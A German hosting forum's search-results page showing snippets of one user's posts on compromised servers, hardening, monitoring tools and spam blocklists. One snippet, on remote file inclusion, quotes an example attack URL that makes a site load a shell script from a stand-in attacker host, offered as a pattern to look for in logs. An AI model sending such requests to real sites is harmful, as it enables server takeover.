Search results



  1. I

    SORBS Listing / EMails vom Server Support Forum

    :D ack (mehr will ich dazu mal lieber nicht sagen)
  2. I

    Einfache Server einrichtung

    Du könntest dir ein Upload-Skript kaufen online, diese gibt es schon für kleines Geld. Ansonsten müsste man etwas personalisiertes entwickeln und programmieren.
  3. I

    kompromittierter Server?

    @marce: Da stimme ich dir zu, meine Tipps am Anfang des Threads, waren reine standard Tools mit denen man einen basis Hack relativ schnell erkennnen sollte.
  4. I

    kompromittierter Server?

    Ohne jetzt zu weit vom Thema ab zu weichen, viel konstruktiver war dein Beitrag jetzt aber nicht, oder? Ich gehe meist immer vom schlimmsten aus, wenn der Provider sich schon beim Endkunden meldet. Das hat im Normalfall immer eine Vorgeschichte, sonst würde der Provider sich nicht beim...
  5. I

    kompromittierter Server?

    Das sieht klassisch nach einem übernommenen (gehackten) Server aus. Bitte überprüfe die aktuell gestarteteten Prozesse mit ps aux und durchsuche diese nach ungewollt gestarteten Programmen und Skripten. Dann nach würde ich nach offenen Ports suchen, vielleicht wurde eine Backdoor...
  6. I

    SORBS Listing / EMails vom Server Support Forum

    Die Umstellung von SORBS *grins*
  7. I

    Plesk Passwort-Eingabe und Firefox

    Vielleicht eine nicht ganz saubere Lösung, wäre das Master Passwort von Firefox zu setzen. So sollte es Usern nicht mehr möglich sein, Passwörter zu speichern. Meiner Meinung nach, sollte man eher die Arbeitsplätze, so konfigurieren, dass jeder einen eigenen User bekommt. Stichwort: windows...
  8. I

    Port 25

    Kannst du das Problem ein wenig genauer beschreiben: Was genau ist passiert? Was steht in den Logfiles? Ein paar mehr Informationen brauchen wir schon :)
  9. I

    Server absichern und Härten

    Ich habe im Einsatz "Munin" "Monit" und "Nagios" kann ich dir empfehlen. Vielleicht einen Schritt weiter gehen und ein IDS verwenden. OSSEC oder SNORT kann ich dir empfehlen. Sichere deine PHP-,CMS (Joomla,Wordpress,etc) Webseiten ordentlich ab, sonst hilft dir auch das Setup kaum...
  10. I

    S4Y Pro X4 - wegen IRC-Bot gesperrt Was nun?

    Es gibt mehrer Möglichkeiten, entweder ist der Angreifer über eine Sicherheitslücke (z.B. kürzlich entdeckte proftpd) oder über eine RFI (remote file inclusion) oder MySQLi (MySQL Injection) auf deinen Server gekommen und hat dann die Schadsoftware (Malware) ausgeführt. Wichtig ist, dass wenn...
  11. I

    Bridging Xen3

    Ich selber habe lang ueber das Routing von Hetzner nach gedacht und bin zu dem Entschlüsse gekommen, dass man ueber ein "ge-briged" Network Interface plus IPtables nicht umherkommt. Selber habe ich mehrere Virtualboxen laufen mit einem internen IPtables routing. (Internal external IP routing)...
  12. I

    [!] Strato meldet Kompromittierung meines Servers über proftp

    Ich kann nur meinen "Vorrednern" recht gebeben. Sichert eure Kisten ab, oder schaltet die Dienste sofort ab. Ueber die Verantwortung eines Servers sind sich wohl einige nicht im klaren. Falls ihr es alleine nicht geloeest bekommt, holt euch professionelle Hilfe oder wechselt auf ein managed...
  13. I

    rkhunter-Warnung: Suspicious file types found in /dev:

    Vielleicht waren es auch RFI (remote file inclusion) Attacke. Schau nochmal in den Logs nach ungewoehnlichen POST aufrufen oder solche HTTP Aufrufe Deine-seite.de/index.php?info=http://hacker-seite.de/shell.php
  14. I

    www.Anti-Hack.net - Anti-Hack - Gemeinsam gegen DDoS, Spam u. Hacker

    Hey Florian, Cooles Projekt, komisch das ich davon nichts mitbekommen habe. Ist das von 1&1gesponsort? Dein SOD Bild kommt mir bekannt vor. :) Werde mich mal anmelden. Gruß Michael
  15. I

    Bitte um Freischaltung der Signatur

    Hallo, ich bitte Euch, das Einfügen einer Signatur bei mir frei zu schalten. Soweit erfülle ich alle Kriterien, laut "Punkt 1: Benutzer" der Foren-Regel für die Freischaltung der Signatur. mfg ITS
  16. I

    Serveradministrator

    Anfrage per PN gesendet.
  17. I

    SSI? SSH? Mod_Rewrite? Subdomains anlegen?

    Fang die Variablen sauber ab, sonst freut sich wieder mal ein skript-kiddie. (Nur ein gut gemeinter Tipp) Höher auf den "danton"!
  18. I

    fail2ban - automatische Abuse Mail

    Oh, der Chef persoenlich hat sich zu Wort gemeldet. :) @blocklist: kann dir nur voll zustimmen und mache hierdurch die User auf dein Projekt aufmerksam.
  19. I

    Backup Script für SQL und FTP

    Willst du ein solches Skript nicht mit uns teilen, oder ist es eher ein kommerzielles Skript?
  20. I

    fail2ban - automatische Abuse Mail

    Bei blocklist.de wird nur einmal am Tag eine Abuse-Mail generiert die dann gesammelt an den Provider geht.
Back
Top